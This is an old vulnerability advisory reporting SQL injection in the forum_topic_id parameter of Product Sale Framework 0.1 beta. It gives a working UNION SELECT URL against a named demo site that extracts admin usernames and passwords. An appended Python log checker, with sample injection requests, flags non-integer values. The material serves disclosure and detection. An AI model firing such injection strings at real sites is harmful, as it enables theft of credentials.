Product Sale Framework 0.1b SQL Injection

2008-12-09T00:00:00
ID PACKETSTORM:72730
Type packetstorm
Reporter b3hz4d
Modified 2008-12-09T00:00:00

Description

                                        
+++++++++++++++++++++++In The Name Of Allah+++++++++++++++++++++++++++  
+ Product Sale Framework SQL Injection Vulnerability +  
+ Discovered by b3hz4d +  
+ WwW.DeltaHacking.Net +  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
APA Center of Yazd University   
(https://www.ircert.cc)   
  
  
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)  
DATE : 06 Dec 2008  
SITE : WwW.DeltaHacking.Net  
CONTACT: behzad_sh_66@yahoo.com  
  
#####################################################  
  
APPLICATION : Product Sale Framework v0.1 beta  
DOWNLOAD(free): http://www.productsaleframework.com/downloads/psf.zip  
VENDOR : http://www.productsaleframework.com  
DEMO (links) : http://www.productsaleframework.com  
  
#####################################################  
  
  
[+] vuln :   
customer.forumtopic.php  
  
The vulnerability is in the forum (the forum_topic_id parameter of customer.forumtopic.php). All demo links (Admin demo, Affiliate demo, Customer demo) are here:  
  
http://www.productsaleframework.com/  
  
[+] Exploit :   
Admin Username and Password:  
  
http://www.kalptarudemos.com/demo/psf/customer/customer.forumtopic.php?forum_topic_id=-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb  
  
  
##########################################################################################################  
  
# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all members in DeltaHacking.Net & Snoop-Security.Com #  
  
##########################################################################################################  
  
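An added example, not part of the original advisory or the vendor's code: a Python log check that flags requests to customer.forumtopic.php whose forum_topic_id is not a plain integer, which is what the URL in the advisory relies on. The access-log format (Apache combined style), the sample lines, and the assumption that legitimate topic ids are small non-negative integers are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

TARGET = "customer.forumtopic.php"   # script named in the advisory
PARAM = "forum_topic_id"             # parameter used in the advisory's URL
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
VALID_ID = re.compile(r"[0-9]{1,10}")  # assumption: ids are non-negative integers

# Constructed sample log lines (documentation IP range, shortened test values).
SAMPLE_LOG = [
    '198.51.100.7 - - [09/Dec/2008:10:01:02 +0000] '
    '"GET /customer/customer.forumtopic.php?forum_topic_id=12 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [09/Dec/2008:10:01:09 +0000] '
    '"GET /customer/customer.forumtopic.php?forum_topic_id=-1%20union%20select%201,2,3,4,5,6 HTTP/1.1" 200 734',
    '198.51.100.9 - - [09/Dec/2008:10:01:15 +0000] '
    '"GET /customer/customer.forumtopic.php?forum_topic_id=7&forum_topic_id=7%27 HTTP/1.1" 200 734',
    '198.51.100.3 - - [09/Dec/2008:10:02:00 +0000] '
    '"GET /customer/index.php?page=2 HTTP/1.1" 200 2048',
]


def suspicious_topic_requests(lines):
    """Return (client_ip, decoded_value) for every non-integer forum_topic_id."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith(TARGET):
            continue
        # parse_qs URL-decodes each value and keeps repeated parameters,
        # so a clean first value cannot hide a tampered second one.
        values = parse_qs(url.query, keep_blank_values=True).get(PARAM, [])
        for value in values:
            if not VALID_ID.fullmatch(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_topic_requests(SAMPLE_LOG):
        print(f"{ip} sent non-integer {PARAM}: {value!r}")
```

The same integer-only rule belongs in the application itself, together with a parameterized query, so the check here is a detection aid rather than the fix.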